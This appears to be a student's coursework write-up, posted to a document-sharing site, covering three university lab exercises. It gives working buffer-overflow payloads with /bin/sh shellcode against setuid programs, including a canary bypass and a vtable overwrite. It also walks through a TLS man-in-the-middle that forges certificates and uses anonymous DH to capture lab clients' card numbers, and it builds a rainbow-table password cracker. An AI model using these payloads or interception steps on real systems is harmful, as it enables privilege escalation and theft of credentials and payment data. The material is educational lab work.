AK
Uploaded byAristotelis Kotsomitopoulos
194 views

Computer Security

The document discusses three different buffer overflow exploits against three users (superuser, hyperuser, and masteruser) on a Linux machine. The superuser's program can be exploited through a simple buffer overflow. The hyperuser's program uses a canary but can still be exploited by overwriting a vulnerable function pointer. The masteruser's program must be exploited by overwriting the virtual pointer table. Code examples and steps are provided for each exploit.

Embed presentation

Download to read offline
Buffer overflows knowledge requirements : C/C++ Assembly program memory allocation Linux permissions. There are three users on the same Linux machine with a secret.txt file each one. Each of the users (superuser, hyperuser, masteruser) have an executable on their directory which can be executed by all the other users. When executing the program users will have the owners permissions and not the permissions of the user executing it. The goal we trying to succeed is to to create a Shell running from the executables with the victim's privileges by overwriting a usefull address/bit. Superuser: program: convert.c without any protection against buffer overflows Hyperuser: program: arpsender.c uses a canary to protect against buffer overflows. Masteruser: program: zoo.cpp must be exploited using the VPTR.
Kotsomitopoulos Aristotelis Project #1 ΥΣ13 ΕΑΡΙΝΟ 2014 (computer system security) SuperUser Here we just try to place in our RET address a value inside our buffers first NOPS, so our ip will continue until it finds our SHELLCODE! our buffer will look like [NOP NOP NOP NOP...SHELLCODE...ADDR ADDR ADDR ADDRR] for exaple we can use 820 size buffer to be sure we overwrite the RET value with ADDR we can use Exploit3.c from Alef with value 820 = 720(our date buffer ) + 100 (is a good choice)so we create easily the above buffer and we can use : /home/superuser$ ./convert a $EGG (our ENVIROMENTAL var)(code at last page) to open our shell... an alternative way is to work like the HYPERUSER and create a bash script that simply modify the RET value with ADDR at once(almost the same with alef) using command : "info locals" we can find our date buffer start address and we can add a bit offset to overwrite our address, and with "info f" we can check when our RET value is overwrited with the NOPS address or the start of our shellcode and we are DONE!! --------------------------------------- supersecret.txt --------------------------------------- $ cat supersecret.txt One is is three in any people a of is in called In example read a is the simply into parts to How is each the itself? possible the that about is a interesting discussed later orutnFolvthlleroj SERIAL:1399762801- c9a58cf2a26af87ec9de1745f2eaed5f298dae7581b6dcd7d77d1eaa33104fad7031c4f9814bdcc3e5 72b8e0476c1e1aa0c1eb3523756beeaa1b4ee0d67d1c72
HyperUser Firstly i hacked hyperuser using the follow script : With the above instructions i succeed to jump to my RET address without touching the canary by using a vulnerable pointer.
Hyperscript.sh (original code at last page) //chmod +x Hyperscript.sh #!/bin/bash `perl -e 'printf #buffer address before shell code on NOPS "x1exa0x04x08" . #our 5th letter we wanna have 140 ascii value chr(140) . #we add 60 x NOPS "x90" x 60 . #we add Shell Code "xebx1fx5ex89x76x08x31xc0x88x46x07 x89x46x0cxb0x0bx89xf3x8dx4ex08x8dx56 x0cxcdx80x31xdbx89xd8x40xcdx80 xe8xdcxffxffxff/bin/sh" #we add 10 x NOPS "x90" x 10 . #we add RET address to our vulnerable pointer "AAAABAAACAAAAADAAAAx8cxf6xffxbf";' > output.txt` --------------------------------------- HYPERSECRET.txt --------------------------------------- $ cat hypersecret.txt interesting how possible people, general number to secret text. something cryptography secret this that right simple presented text divided three and three much leaked share secret Is to secret no the leaked share? questions in on! nalisr inengeect SERIAL:1400202302- bc1977e5b8b6526c4065fc92591f912e95075079bee1f1c6ae6d7b4b40390b9ece61342f212c1f5cf 87cb0be4df16698c49f51191d7f417e067bf90db0b7f536
MasterUser we overwrite the VPTR at the end of our first buffer[256] and we need to call ("-s") in order for the virtual function to be called.. we must create a "virtual Vtable" in our buffer to confuse our program and for example if our pointer try to call an overload operator or a print function from vtable it will load our shellcode... so our form is : using “info f” with break 13 we can find our THIS address or our class VTABLE starts at 0x804a008 so we want to replace vptr with 0x804a008+4 so it will point there and inside the 0x804a008+4 we will place our nops or shellcode address. Lets have a better look:
so now our SELLCODE can be Executed : std10048@sbox:/home/masteruser$ ./zoo -c `perl -e 'printf "x18xa0x04x08x18xa0x04x08x18xa0x04x08x90x90x90x90xeb x1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8dx4ex08x8 dx56x0cxcdx80x31xdbx89xd8x40xcdx80 xe8xdcxffxffxff/bin/sh" . "A" x 195 . "x0cxa0x04x08" x 8 ;'` -s we could avoid placing 8x addresses at the end if we have counted byte by byte exactly the Vptr location. --------------------------------------- MASTERSECRET.txt --------------------------------------- $ cat mastersecret.txt question it for or for of share piece This that is sharing. little you now solution where is vertically different distributed parties. information from about passage it divide so information secret by These will class Cgtao!sog haofpone SERIAL:1400759702- 8f9a1fe300998d1d45bdaf99740699fcc68786fb04d9c83b8056d6839f3aed2c66446bb9d17c5c1cf c6b3c4da35af78504713ab70b4c5082eae2f4ab44c3c7b2
Final TEXT SUPER+HYPER+MASTER #include<iostream> #include<string> #include<fstream> using namespace std; int main(void){ ifstream super,hyper,master; super.open("superuser.txt"); hyper.open("hyperuser.txt"); master.open("masteruser.txt"); string Sword[37],Hword[38],Mword[37]; //wc -w filename.txt int i=0; while(super >> Sword[i]){ i++; } i = 0; while(hyper >> Hword[i]){ i++; } i = 0; while(master >> Mword[i]){ i++; } for (i = 0;i<37; i++){ cout<<Sword[i]<<" "<<Hword[i]<<" "<<Mword[i]<<" "; } cout<<Hword[37]<<endl; return 0; } So Our Final Text: One interesting question is how it is possible for three people, or in general for any number of people to share a secret piece of text. This is something that in cryptography is called secret sharing. In this little example that you read right now a simple solution is presented where the text is simply divided vertically into three different parts and distributed to three parties. How much information is leaked from each share about the secret passage itself? Is it possible to divide the secret so that no information about the secret is leaked by a share? These interesting questions will discussed in class later on! Cgtao!sog orutnFolvthlleroj nalisr haofpone inengeect
Exploit3.c HyperScript.sh
Man-in-the-middle attack to TLS (RFC 52461) Protocol An online shop webshop.com in the address https://sbox.di.uoa.gr/ and 6 different clients that they try to connect to the workshop via TLS. The webshop has a certificate singed up by the certification authority Compsec CA All clients have access in the self-singed certificate of the Compsec CA. With each ssh connection in the sbox.di.uoa.gr the 6 clients will try to connect with the webshop.(one each time) Display Message: timestamp: XXXXXXXXXX forwarding webshop client requests to port YYYYY clients because of a misconfiguration will try to connect to YYYY instead of (443) port of the webshop.So now we have the ability for the man-in-the-midle-attack. Difficulty 1. Mr. Blonde. X 2. Mr. Blue. XX 3. Mr. Brown. XX 4. Mr. Orange. XX 5. Mr. Pink. XXXX 6. Mr. White. XXXXX
Kotsomitopoulos Aristotelis Project #2 ΥΣ13 ΕΑΡΙΝΟ 2014 (computer system security) Firstly Lets Create a certification authority(CA) my folder is “std10048@sbox:~/myProject2$” we execute the following: cp /etc/ssl/openssl.cnf . (we modify the ./demoCA to ./) mkdir certs csr newcerts private echo 00 > serial echo 00 > crlnumber touch index.txt openssl req -new -x509 -extensions v3_ca -keyout private/cakey.key -out cacert.crt -days 3650 -config ./openssl.cnf openssl ca -gencrl -keyfile private/cakey.key -cert cacert.crt -out crl.pem -config ./openssl.cnf with are my informations for CA so now we have our CA and our folders created they look something like this :
Now that we have our CA created lets generate a certificate using our CA Lets hack firstly Mr.Blond ! He is a realy idiot client he checks almost nothing so : openssl genrsa 1024 > private/MrBlond.key && openssl req -new -key private/MrBlond.key -out csr/MrBlond.csr -config ./openssl.cnf so now lets continue with this command to complete our generation and then we dont even need to verify with CA for that client. openssl ca -config openssl.cnf -policy policy_anything -cert cacert.crt -keyfile private/cakey.key -days 365 -out certs/MrBlond.crt -infiles csr/MrBlond.csr
so now we have our .crt and our .key std10048@sbox:~/myProject2/certs$ cat MrBlond.crt Certificate: Data: Version: 3 (0x2) Serial Number: 0 (0x0) Signature Algorithm: sha1WithRSAEncryption Issuer: C=GR, ST=ATTICA, L=Athens, O=University of Athens, OU=Department of Informatics and Telecommunications, CN=SBOX CA/emailAddress=csec.di@gmail.com Validity Not Before: Jun 7 13:02:45 2014 GMT Not After : Jun 7 13:02:45 2015 GMT Subject: C=GR, ST=ATTICA, L=Athens, O=Uoa, OU=DiT, CN=idiot_Client/emailAddress=idiot_client@gmail.com Subject Public Key Info: Public Key Algorithm: rsaEncryption Public-Key: (1024 bit) Modulus: 00:be:c7:07:e7:80:9a:ab:12:78:04:97:04:5e:2a: 6d:31:7b:29:1a:3e:78:10:f3:cb:b4:ed:f1:f9:87: b3:72:57:01:ae:1f:2f:33:95:ba:cd:64:b5:20:37: 0d:cb:c8:df:eb:ff:e9:ca:47:1d:db:b6:2c:bb:35: 4f:66:2f:6a:c9:c0:2b:f1:12:fc:f1:58:72:03:b1: 8b:56:bf:44:14:af:ed:a6:0b:9c:92:2d:3b:e3:59: 9e:6d:32:cf:e4:cd:06:ff:af:dc:f2:d0:1b:1e:98: b6:73:07:37:c3:a6:38:47:b1:7d:d3:d8:e4:f0:b5: 3b:4a:7f:fb:8e:af:7a:73:95 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Basic Constraints: CA:FALSE Netscape Comment: OpenSSL Generated Certificate X509v3 Subject Key Identifier:
7E:B8:D8:FD:79:0C:F0:F2:DC:CE:9D:61:15:5D:91:13:4B:E2:F1:83 X509v3 Authority Key Identifier: keyid:41:DF:39:D0:2D:BB:25:0D:70:38:3B:21:94:B8:C7:39:ED:05:AF:E1 Signature Algorithm: sha1WithRSAEncryption 03:19:8f:60:83:79:db:7a:99:c1:75:14:49:a7:fb:98:2e:c0: 23:24:39:04:43:6a:11:1d:b3:7b:b5:fe:36:ed:0e:bd:19:83: 8d:e7:43:e6:e4:c7:f1:f3:b6:28:1d:50:4f:82:d6:ac:32:95: a6:1b:b1:52:3e:09:2c:c6:1a:86:55:1a:20:07:af:c4:60:f0: 2b:ef:59:b1:81:c5:66:8a:52:62:f1:e9:94:9b:ee:b6:76:fb: 98:ff:a9:94:8c:e7:fe:31:0c:06:7b:2e:3b:d4:d2:36:19:df: e0:af:09:51:86:82:18:c6:57:da:e6:15:68:b0:79:0a:52:bd: 34:f6:1c:46:88:80:da:8a:2b:6f:33:4d:38:16:89:b9:ad:83: ee:11:90:02:13:ce:e0:68:83:32:17:a4:70:82:5a:57:f9:64: c3:74:2f:59:95:33:ce:7e:8c:81:b9:e7:b1:5e:dd:0e:b4:59: 2b:e5:b3:ed:38:40:7f:74:40:8f:fc:db:a4:b5:76:e0:74:e8: 1f:ba:f5:f1:ba:09:96:6d:90:0e:77:33:a3:27:0d:fb:c1:a6: 1c:53:51:71:3a:83:5c:ba:2e:12:67:40:5b:7e:b9:fb:91:97: e8:ef:ff:8a:70:94:02:69:d7:39:42:4c:a3:0a:c0:b3:3d:42: 44:f2:8e:65 -----BEGIN CERTIFICATE----- MIIDujCCAqKgAwIBAgIBADANBgkqhkiG9w0BAQUFADCBvTELMAkGA1UEBhMCR1Ix DzANBgNVBAgMBkFUVElDQTEPMA0GA1UEBwwGQXRoZW5zMR0wGwYDVQQKDBRVbml2 ZXJzaXR5IG9mIEF0aGVuczE5MDcGA1UECwwwRGVwYXJ0bWVudCBvZiBJbmZvcm1h dGljcyBhbmQgVGVsZWNvbW11bmljYXRpb25zMRAwDgYDVQQDDAdTQk9YIENBMSAw HgYJKoZIhvcNAQkBFhFjc2VjLmRpQGdtYWlsLmNvbTAeFw0xNDA2MDcxMzAyNDVa Fw0xNTA2MDcxMzAyNDVaMIGJMQswCQYDVQQGEwJHUjEPMA0GA1UECAwGQVRUSUNB MQ8wDQYDVQQHDAZBdGhlbnMxDDAKBgNVBAoMA1VvYTEMMAoGA1UECwwDRGlUMRUw EwYDVQQDDAxpZGlvdF9DbGllbnQxJTAjBgkqhkiG9w0BCQEWFmlkaW90X2NsaWVu dEBnbWFpbC5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAL7HB+eAmqsS eASXBF4qbTF7KRo+eBDzy7Tt8fmHs3JXAa4fLzOVus1ktSA3DcvI3+v/6cpHHdu2 LLs1T2YvasnAK/ES/PFYcgOxi1a/RBSv7aYLnJItO+NZnm0yz+TNBv+v3PLQGx6Y tnMHN8OmOEexfdPY5PC1O0p/+46venOVAgMBAAGjezB5MAkGA1UdEwQCMAAwLAYJ YIZIAYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1Ud DgQWBBR+uNj9eQzw8tzOnWEVXZETS+LxgzAfBgNVHSMEGDAWgBRB3znQLbslDXA4 OyGUuMc57QWv4TANBgkqhkiG9w0BAQUFAAOCAQEAAxmPYIN523qZwXUUSaf7mC7A IyQ5BENqER2ze7X+Nu0OvRmDjedD5uTH8fO2KB1QT4LWrDKVphuxUj4JLMYahlUa IAevxGDwK+9ZsYHFZopSYvHplJvutnb7mP+plIzn/jEMBnsuO9TSNhnf4K8JUYaC GMZX2uYVaLB5ClK9NPYcRoiA2oorbzNNOBaJua2D7hGQAhPO4GiDMhekcIJaV/lk w3QvWZUzzn6MgbnnsV7dDrRZK+Wz7ThAf3RAj/zbpLV24HToH7r18boJlm2QDncz oycN+8GmHFNRcTqDXLouEmdAW365+5GX6O//inCUAmnXOUJMowrAsz1CRPKOZQ== -----END CERTIFICATE----- std10048@sbox:~/myProject2/private$ cat MrBlond.key -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQC+xwfngJqrEngElwReKm0xeykaPngQ88u07fH5h7NyVwGuHy8z lbrNZLUgNw3LyN/r/+nKRx3btiy7NU9mL2rJwCvxEvzxWHIDsYtWv0QUr+2mC5yS LTvjWZ5tMs/kzQb/r9zy0BsemLZzBzfDpjhHsX3T2OTwtTtKf/uOr3pzlQIDAQAB AoGBAIOrepkc+aL4rDz+vdUAEz0Dc+rZEqUgnofRciB2uDNCObajb0B7JuJ7j0cc uDjd+y43AnTJgKITqevLb3FnaJuDU3P7acg7pBqwQONdZBUHoos59uNr9T7IFRe1 sjddN1c3yyXRVoHXC1IjuwcDCoYTjB5DEkRuwXflP3fpFYBBAkEA9pS2SndYaIV4 +Glo6TJZpljY8xMXHEZXSCQ+vdsGYiP+pO84ApimoHqKlgly3vO4pREdAj56jgM/ 1PmXuAhF5wJBAMYQn3y9W99IVEZVWBFAFM1RrvXu07QuchgQ3eRfvaPDSNulNVgU hDVf/NKLQU3qOTaFPpXmcROI9eSPKBb5UyMCQQC3oYwX7MUUIcIzDR0p/WsyLJx0 eVUOo3vAp+1pqkEYuUGcRuJpXJFKlbe7gJHhY5Owqgv2bd0LAXR6AN5yGQclAkEA p3iqwhiCtDs+NvI2su9SJ4FnxL8Z9oJHKp4oYM+rU+rtkfsRLda7Kz5sUcI5h54C nlzv3GOrPO9Tqtx482QBrQJAWX1o/vNW+LPvQfMDPEqWozGV3TeMVtKCt52qoPUu 0po9JXx2WZEmjObrCyEgau/GxuUN5UeAqG+w7grgzTk85A== -----END RSA PRIVATE KEY-----
Now we can run twestedeve like that : command: twistedeve -c certs/MrBlond.crt -k private/MrBlond.key -a localhost:10048 -t localhost:443 -b localhost:46619 so we can be the man in the middle. After commands execution we open new terminal we login we find the correct port (46619 this time) for our connection and our Mr.BLond Client have been hacked : So this is First Client Credid card and timestamp 'cc=4916105057678726&timestamp=1402146284' Now lets hack Mr.Blue ( i named it brown ) he is more `clever` than Mr.Blond but he has another vulnerability he checks company name so with our previous CA we create a new certificate but this time we insert in common name field “sbox.di.uoa.gr “ so:
so we simply again run twistedeve and : twistedeve -c certs/brown.crt -k private/brown.key -a localhost:10048 -t localhost:443 -b localhost:48211 so we can observe Mr.Blue credit card and timestamp : 'cc=4556270584159924&timestamp=1402148722' now lets hack Mr.Brown we know that webshop and mysite have both the same Cartification Authority (sbox CA) so Mr.Brown Checks only if our .crt and our .key are verified by SBOX CA and nothing more so: SBOX CA mysite.com webshop.com we use twestedeve with /var/project2/mysite.com.crt and /var/project2/mysite.com.key and now we can get Mr.Brown credit card !
Command : twistedeve -c /var/project2/mysite.com.crt -k /var/project2/mysite.com.key -a localhost:10048 -t localhost:443 -b localhost:46749 So here is credit & timestamp for Mr.Brown 'cc=4539346713524865&timestamp=1402150208' Mr.Orange now : we will use certification chain we now know how to create CA generate certifications and sign with them.. so now lets try something different! In our new folder after those commands : cp /etc/ssl/openssl.cnf . mkdir certs csr newcerts private echo 00 > serial echo 00 > crlnumber touch index.txt instead of using : openssl req -new -x509 -extensions v3_ca -keyout private/cakey.key -out cacert.crt -days 3650 -config ./openssl.cnf
the above command will create a brand new cakey.key and cacert.crt file we will use our existing ones from mysite.com , so we navigate to /var/project2/ and we copy our mysite.com.key and our mysite.com.crt : now lets create the two files in order to use correctly our next command we create cacert.crt and /private/cakey.key and we paste our coped contents from mystie now we can use the generation command with our custom files! openssl ca -gencrl -keyfile private/cakey.key -cert cacert.crt -out crl.pem -config ./openssl.cnf now we will generate our certificate using the above CA : openssl genrsa 1024 > private/sbox.di.uoa.gr.key && openssl req -new -key private/sbox.di.uoa.gr.key -out csr/sbox.di.uoa.gr.csr -config ./openssl.cnf openssl ca -config openssl.cnf -policy policy_anything -cert cacert.crt -keyfile private/cakey.key -days 365 -out certs/sbox.di.uoa.gr.crt -infiles csr/sbox.di.uoa.gr.csr
so now lets create our certification chain we will paste in our /certs/sbbox.di.uoa.gr.crt our mysite.com pure certificate so there will be our expected confusuin from our client and our “man in the middle” will purchase victims credid card number ------BEGIN CERTIFICATE----- ..... our above created certificate code ..... ------END CERTIFICATE------ ------BEGIN CERTIFICATE----- ..... mtsite.com certificate code ..... ------END CERTIFICATE------
so our file will look something like this: our certificate copyed from mysite.com.crt now we can start twistedeve and try our .crt and .key lets see : twistedeve -c certs/sbox.di.uoa.gr.crt -k private/sbox.di.uoa.gr.key -a localhost:10048 -t localhost:443 -b localhost:41866 our man in the middle listen at port 41866 we login and realise that Mr.Orange has been hacked
credit card successful attack! So our credit card number & timestamp is : 'c=4716666995541278&timestamp=1402231087' For Mr.Pink now. Lets try to use twistedeve with a filter and without using certificate: twistedeve -c -f /var/project2/filters/tlsinfo.py -a localhost:10048 -t localhost:443 -b localhost:41866 so we can see what client and server protocols etc supports. We can see that client 5 Mr.Pink uses TLS_DH_anon_WITH_AES.. so here is the problem we can create an openssl custom server that will listen in a port “4444” then we will redirect with twistedeve our users to that port and with our openssl server would be set with no certificate is used option. This restricts the cipher suites available to the anonymous ones (currently just anonymous DH).
Here we can see that we use that DH_anon! So now lets create our openssl server : openssl s_server -accept 44444 -nocert -cipher DH (cipher suites using DH including anonymous DH) so now we can run twistedeve like that : twistedeve -c -a localhost:10048 -t localhost:44444 -b localhost:43566 (clients port) so lets run our clients at port(43566) with our server and twistedeve opened(we need three terminals) so ALL clients will fail except Mr.Pink so we will be able to steal his credit card!
Mr.Pink request sent everything else failed! Credit card and timestamp So Mr.Pinks Credit Card & Timestamp is : 4486750853453368&timestamp=1402274478 Mr.White has a complete TLS protection so he needs a more powerful hacker to be hacked!!!
Rainbow Tables Kotsomitopoulos Aristotelis Project #3 ΥΣ13 ΕΑΡΙΝΟ 2014 (Computer System Security) I want to hack a password of 6 chars, those chars must have been created from the given alphabet. Alphabet:(64) "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@" so a password example can be “AriS1@”. In order to hack this password i will use rainbow tables! passwords are stored as the output of a hash function. Hashes are one-way operations. Even if an attacker gained access to the hashed version of your password, it's not possible to reconstitute the password from the hash value alone but its possible to attack the hashed value of your password using rainbow tables. We have 64^6 different password = 68.719.476.736 = 69 billion different passes First of all i create for example 1.000.000 different passwords 6 char long and this will be the start of my chain something like : !!!7B0 !!!80! QBLfQU VM7Ucl eORyLL lXO8rC t9p48R 8Qi!cm 8QjgAU I3m2Zn ..... ... now for every plaintext of the above we will create a chain plaintext -> hash = blake(plaintext) -> new_plaintext = my_reduction_function(hash) -> hash = blake(new_plaintext) -> repeat.....->......->.... in my program i create a chain 10.000 long so for every plaintext i use
blake+my_reduction_function (10000 times). Finally i will have almost 1.000.000 x 10000 = 10 billion different values (without collisions) so if we had 1 password given i have 1/7 possibilities to hack it but now i have more than 15 password given so that size is enough with a bit of luck... to generate that size of rainbow table took more than 16 hours... in my ophinion the best size for that problem would be 5 million x 10.000 but that need alot lot lot of time to be generated even with threads and multicore processor! So after that huge generating i place the results in a .txt file an my search-find password program will use that table to hack the password.. the file will look like this : output_1mX10000.txt !!!7B0 77240e13ebff7ea020e62d90975cd17963fa818bec3f55836e2fcd4780ea48d9 (1) !!!80! f55715be2179b0fb9d3f83bdb39fed8374afcbaea9213e4f2001a0b8734a0765(2) !!!80Z 3410c7d80d27f5bd489f5dd5c0533043c6ce17c363f8ab7acf7b91511df5ac96(3) !!!YI2 1657ca495a203164edc363700c86adbe54374edc05cf474e70030a842f76da68(4) !!!oC@ 0f1e9b44a2441c46f0c525f5c22777c4f009ec1b0f5776604b42639cf230648f(5) !!!uZW d2953ba6e7074c76c0461eb8ec7d7c36bcb434001284abba8d0c92d6bd892f7a(6) !!07fO 5b9ef9c41b5444476e2c66e050c795031185f42bfc40bf8f174f1e0e3bb8f581(7) !!0JB0 7a73cb5357eb35ecfc82ebc351112824c54bdaa70603fe5262e21f22fd13cd60(8) !!0R7U 6ffdb183126ca9e70b659ea45f4dcb0ca78c7136f72fa733bb960d315eca19a0(9) !!0XJ6 85b0c65a867e08b6ae7d7d65ddae3c6e4def38ad805cbb96b75a49884928852b(10) !!0fNM 790fe297f6ca448cdd97e083176ad3e492258ea2167f9048119da9dcbfaa12d9(11) !!0kyY 5498173ef57774579a8095eb6d32a2bee8cac4bf9153ddda011ab33d600d6257(12) !!0rik 73288f5ab7e7fc5b1d2a387dacc6401b24c422494d5d4f6ad280e4d046b83327(13) !!1wh0 98f12f574918ff51e92369c38d9369d474b2f2bf0291d79e6bb3be71ed7abd2d(14) ....... ............... ........................ ............................. zzxEpx f9042996c416d9f32395b0bb967aca9df277f4e8dcd14794bc60a820aa5d286f(999988) zzxMxc c1409a47dab4ce96a013a7033c868d56888a748cf670c28b86c1413c6801fd92(999989) zzxpFE e6dba8c5b25946070e7f680e2255a08aba46ca92fdf2e818f245ad01fb8fba03(999990) zzxvEY f028262e61fee77d2104ef928d195d6b401fdb50522bdacad088ab0df197a756(999991) zzyw9@ 0861fc88106fffb2e9731b5a6b67b5ffc891d19d2b8b8334c57a97ce50bf3e0a(999992) zzz4sv bf6aef7de87249ecaee1bb8c83b1025d3c238226f1ce47999b1dbc24fd2bab6e(999993) zzzAuV dd6e7cfa2031148cf1c22c1756bd7f5a0cb8c96e581e87cf1fb3dada8963cfee(999994) zzzGGs 8872e669d2284297bbfe4494ced287de58ff0b60c66d3a1b46a8b7657cc1188f(999995) zzzRqC d5859daaf422a4c73dafe382292c5e1c9dba17361d9176663658a8a48b9e3a08(999996) zzzTe5 946a862717e78677d6eb96b25f952cdee0a91de870789b129abc1d8e4ff15eca(999997) zzzZ67 9750c53137b46208040c93b08cc7ed1454a4fe0e1583511153291bcd0e40b393(999998) zzzgB3 4a5af0f0a7c1b61137bcd1143d447a05c8ada3d63eade369286e807f0b9c554a(999999) zzzyqE a36a2403b3adb9c50094866613fd2e956f500868cbc2a6ee9a99ba8ec8c41b79(1000000) in order to reduce collisions i tried a lot of different reduction functions with a lot of tests , in my final function in order to produce 6 char long random passwords from a given 64 char long hash : i map every char from the hash(16 different chars 0123456789abcdef) with my alphabet “ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@” i add the first 10 hash chars (ex. 0Fa2.. = 0+15+10+2..) and then i make a XOR with the next 10 in that way i produce a number than number MOD 64 give me a number inside my alphabet for example 63 is '@'! and for the 6th char i use the last 4 characters + 6 first in that way i produce a deterministic random string ( plaintext ) for my chain! string plaintext_from_hash3(string my_hash){
string charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@"; string result; int sum = 0; int counter=0; /* this is for our last XOR 50-60 with the last 4 chars + the 6 firsts! */ int last_digits = my_hash[60]+my_hash[61]+my_hash[62]+my_hash[63]; for(int i=0; i<6; i++) last_digits += my_hash[i]; /* this is for our 5 XOR */ int for_XOR[6]; for(int i=0; i<6; i++){ sum=0; for(int j=0; j<10; j++){ if(my_hash[counter] == '0') sum += 0; else if(my_hash[counter] == '1') sum += 1; else if(my_hash[counter] == '2') sum += 2; else if(my_hash[counter] == '3') sum += 3; else if(my_hash[counter] == '4') sum += 4; else if(my_hash[counter] == '5') sum += 5; else if(my_hash[counter] == '6') sum += 6; else if(my_hash[counter] == '7') sum += 7; else if(my_hash[counter] == '8') sum += 8; else if(my_hash[counter] == '9') sum += 9; else if(my_hash[counter] == 'a') sum += 10; else if(my_hash[counter] == 'b') sum += 11; else if(my_hash[counter] == 'c') sum += 12; else if(my_hash[counter] == 'd') sum += 13; else if(my_hash[counter] == 'e') sum += 14; else if(my_hash[counter] == 'f') sum += 15; counter++; } for_XOR[i] = sum; } int res; res = for_XOR[0] ^ for_XOR[1]; //1st XOR if(res<0) res=-res; result+=charset[res%64]; res = for_XOR[1] ^ for_XOR[2]; //2nd XOR if(res<0) res=-res; result+=charset[res%64]; res = for_XOR[2] ^ for_XOR[3]; //3rd XOR if(res<0) res=-res; result+=charset[res%64]; res = for_XOR[3] ^ for_XOR[4]; //4th XOR if(res<0) res=-res; result+=charset[res%64]; res = for_XOR[4] ^ for_XOR[5]; //5th XOR if(res<0) res=-res; result+=charset[res%64]; res = for_XOR[5] ^ last_digits; //6th XOR if(res<0) res=-res; result+=charset[res%64]; return result; } Lets assume for example after we use dbus-monitor in sbox.di.uoa.gr we get the
following hash : 9b465fce3fd32aa5531f801d4c63f31380adc84c62f0d170aaf535619b85a928 so we will search if the above hash is in our table IF WE FIND IT we will use the chains started plaintext to obtain the password we will use blake->reduction->blake->reduction.. until we find our first hash in our case it would be the last one so the plaintext that produced this hash would be our hacked password !.. if we dont match the above hash with our rainbow table hashes then we will use reduction function to our hash then blake and then we will try to find it again if we find it then we will search again the correct chain until we find the FIRST hash(not the new one)..if we fail again we will continue hashing and reducing our given hash until we found a chain match in rainbow table.. if we use in my situation 10.000 loops and dont find a match then we failed and that password cant be hacks with my table..now if we find a match but after expanding the appropriate rainbow table 10.000 and we dont find our FIRST hash then we dont stop we continue exapning and searching for another chain MATCH!! if we check every possible chain and the FIRST isnt there then the password cannot be hacked with that rainbow table.. if we had used a bigger one it would be almost 100% possibility our password would be hacked! After we hack the password we use nc localhost 4433 and we enter the password! We have only 10 seconds to copy hash + paste it to our program + use the above command + paste the result so its a bit hard.. my search function can make an average of 7 second to find the result so its kinda HARD!!! The exercise was developed using C++ in windows (CodeBlocks) and tested in linux ubuntu all my .cpp and .h would are included in my ZIP! My rainbow table has size 100MB so i cant include it! So here is an example of hacking a password from hash! with my search program.. but again my rainbow table is 10 billion without collisions so its a bit small.
Computer Security

More Related Content

PDF
Ngrep commands
byRishu Seth
 
PDF
Php and threads ZTS
byjulien pauli
 
PDF
Redis & ZeroMQ: How to scale your application
byrjsmelo
 
PDF
Feb14 successful development
byConnor McDonald
 
PDF
Créer une base NoSQL en 1 heure
byAmaury Bouchard
 
DOCX
Dns server clients (actual program)
byYoussef Dirani
 
ODP
Rust言語紹介
byPaweł Rusin
 
PDF
Tomáš Čorej - OpenSSH
bywebelement
 
Ngrep commands
byRishu Seth
 
Php and threads ZTS
byjulien pauli
 
Redis & ZeroMQ: How to scale your application
byrjsmelo
 
Feb14 successful development
byConnor McDonald
 
Créer une base NoSQL en 1 heure
byAmaury Bouchard
 
Dns server clients (actual program)
byYoussef Dirani
 
Rust言語紹介
byPaweł Rusin
 
Tomáš Čorej - OpenSSH
bywebelement
 

What's hot

PPT
Unix And Shell Scripting
byJaibeer Malik
 
PDF
Mysqlnd, an unknown powerful PHP extension
byjulien pauli
 
PDF
Ssh cookbook
byJean-Marie Renouard
 
PDF
Learning Dtrace
byJeongHun Byeon
 
PDF
Php engine
byjulien pauli
 
PPT
Unix Programming with Perl 2
byKazuho Oku
 
PDF
Metasploit magic the dark coners of the framework
byRob Fuller
 
DOC
penetration testing - black box type.
byluigi capuzzello
 
PDF
One Click Ownage
byFerruh Mavituna
 
PDF
Character_Device_drvier_pc
byRashila Rr
 
PDF
Cassandra Community Webinar | Introduction to Apache Cassandra 1.2
byDataStax
 
ODP
Puppet
byŁukasz Jagiełło
 
PPT
typemap in Perl/XS
bycharsbar
 
PDF
nouka inventry manager
byToshiaki Baba
 
ODP
Linux Command Line
byPrima Yogi Loviniltra
 
PDF
Scaling antispam solutions with Puppet
byGiovanni Bechis
 
PPTX
Using the Power to Prove
byKazuho Oku
 
PPT
Unix Programming with Perl
byKazuho Oku
 
Unix And Shell Scripting
byJaibeer Malik
 
Mysqlnd, an unknown powerful PHP extension
byjulien pauli
 
Ssh cookbook
byJean-Marie Renouard
 
Learning Dtrace
byJeongHun Byeon
 
Php engine
byjulien pauli
 
Unix Programming with Perl 2
byKazuho Oku
 
Metasploit magic the dark coners of the framework
byRob Fuller
 
penetration testing - black box type.
byluigi capuzzello
 
One Click Ownage
byFerruh Mavituna
 
Character_Device_drvier_pc
byRashila Rr
 
Cassandra Community Webinar | Introduction to Apache Cassandra 1.2
byDataStax
 
Puppet
byŁukasz Jagiełło
 
typemap in Perl/XS
bycharsbar
 
nouka inventry manager
byToshiaki Baba
 
Linux Command Line
byPrima Yogi Loviniltra
 
Scaling antispam solutions with Puppet
byGiovanni Bechis
 
Using the Power to Prove
byKazuho Oku
 
Unix Programming with Perl
byKazuho Oku
 

Similar to Computer Security

PDF
Unix executable buffer overflow
byAmmarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
PDF
Filip palian mateuszkocielski. simplest ownage human observed… routers
byYury Chemerkin
 
PDF
Offensive cyber security: Smashing the stack with Python
byMalachi Jones
 
PDF
Dive into exploit development
byPayampardaz
 
PDF
Exploitation Crash Course
byUTD Computer Security Group
 
PDF
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
byLyon Yang
 
PPTX
antoanthongtin_Lesson 3- Software Security (1).pptx
by23162024
 
PDF
